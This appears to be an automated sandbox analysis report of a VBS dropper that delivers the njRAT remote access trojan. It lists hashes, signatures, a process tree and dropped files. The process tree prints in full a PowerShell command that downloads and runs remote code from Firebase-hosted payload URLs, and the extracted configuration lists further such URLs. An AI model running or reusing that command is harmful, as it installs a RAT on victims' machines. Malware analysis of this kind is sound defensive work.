Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02-05-2024 13:34

General

  • Target
    c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs
  • Size
    271B
  • MD5
    b9acaac18eee9b5cde0c6defbe2c1caa
  • SHA1
    6f8cb34d61f9136e96345684846edf49dfa976bc
  • SHA256
    c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1
  • SHA512
    70c8b3742c98e1daf2c7fda40c992621c2250a9dac648c4798370697f5688e1883162079909dd245a33fc064a843a94f84c7399b99bae9b6418a47b3c5e75e12

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Ssid.jpg?alt=media&token=10629c63-3c23-437a-9543-4f9dcee695bb
    ps1.dropper
    https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/Rnew.jpg?alt=media&token=d68ad7e3-80ed-4083-ad53-8af401c5b503

Extracted

  • Family
    njrat
  • Version
    0.7d
  • Botnet
    H
  • Attributes
    splitter
    |'|'|

Signatures

  • njRAT/Bladabindi
    Widely used RAT written in .NET.
  • Blocklisted process makes network request (2 IoCs)
  • Checks computer location settings (2 TTPs, 2 IoCs)
    Looks up country code configured in the registry, likely geofence.
  • Drops startup file (1 IoCs)
  • Suspicious use of SetThreadContext (1 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
    Using powershell.exe command.
  • Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).
  • Modifies registry class (1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (6 IoCs)
  • Suspicious use of AdjustPrivilegeToken (33 IoCs)
  • Suspicious use of WriteProcessMemory (17 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c07598299d2d73883f23a3585740bca427eb733579c4a0fe2280593d116896f1.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/prog-622b7.appspot.com/o/SidM.jpg?alt=media&token=53ed6ff5-09e0-4464-a19c-f0e9d9c6cec8'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4244
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\sCs.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\sCs.ps1
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3272
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
            5⤵
              PID:1680
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4328

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize
      3KB
      MD5
      556084f2c6d459c116a69d6fedcc4105
      SHA1
      633e89b9a1e77942d822d14de6708430a3944dbc
      SHA256
      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
      SHA512
      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize
      1KB
      MD5
      6c25e98074e3843e30eeda41a1357b92
      SHA1
      88aacfbe76ce89e2024d652a9ac37ad68518e3fe
      SHA256
      17fa8418f7132c304749f477f7b514c3d6358a7d63b5c3f8529055862dfcd67f
      SHA512
      03f82a7f8834e2a914a3486291d9b3cc97642ad8de55035bfc3a172dfe6ea1de2de2a14c974adf1ed32324f7414088f647ce683f0278881c2339d4551efb0e4c

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ioro4gom.or0.ps1
      Filesize
      60B
      MD5
      d17fe0a3f47be24a6453e9ef58c94641
      SHA1
      6ab83620379fc69f80c0242105ddffd7d98d5d9d
      SHA256
      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
      SHA512
      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Public\sCs.ps1
      Filesize
      1KB
      MD5
      e0e7ea9409eb39ae9d9e06ea8d2acd94
      SHA1
      3b8ab9de2c853a0238f3024eb8905ab81b8f634c
      SHA256
      93b29bea09147a94220823e19c53a36c10ac8689bd196d73ae93e56c6acf3713
      SHA512
      14cb12ce1637b7f2749179330328e6aa20871e6e5783f9e0d709ed2051241f0e4ee645c7d4629146c09c75f28470d4232b13aacc4193007c7b1d8644b25bd48f

    • C:\Users\Public\sCs.vbs
      Filesize
      166B
      MD5
      c3e1b2c797679d84c76dcdd5bb81db0d
      SHA1
      f178c6888aa88ef7e940dd1b572ea9ac8c30c56c
      SHA256
      cc9f01e9c6a3d717e775740b64106245324ecc9c77004f6c9b5d7d2e84cdf80b
      SHA512
      be52acfd7294f31f7ee1c573711c915705f044cb762a6d5b6051f39f9774e7ef52287cfba5361e921ead9ca952e2c34f3a4210a4d8aa6badee78b1e7b713e22c

    • memory/3272-34-0x0000025FA2AD0000-0x0000025FA2ADC000-memory.dmp
      Filesize
      48KB

    • memory/4244-0-0x00007FFDAAEC3000-0x00007FFDAAEC5000-memory.dmp
      Filesize
      8KB

    • memory/4244-1-0x000001C764FF0000-0x000001C765012000-memory.dmp
      Filesize
      136KB

    • memory/4244-11-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmp
      Filesize
      10.8MB

    • memory/4244-12-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmp
      Filesize
      10.8MB

    • memory/4244-21-0x00007FFDAAEC0000-0x00007FFDAB981000-memory.dmp
      Filesize
      10.8MB

    • memory/4328-35-0x0000000000400000-0x0000000000414000-memory.dmp
      Filesize
      80KB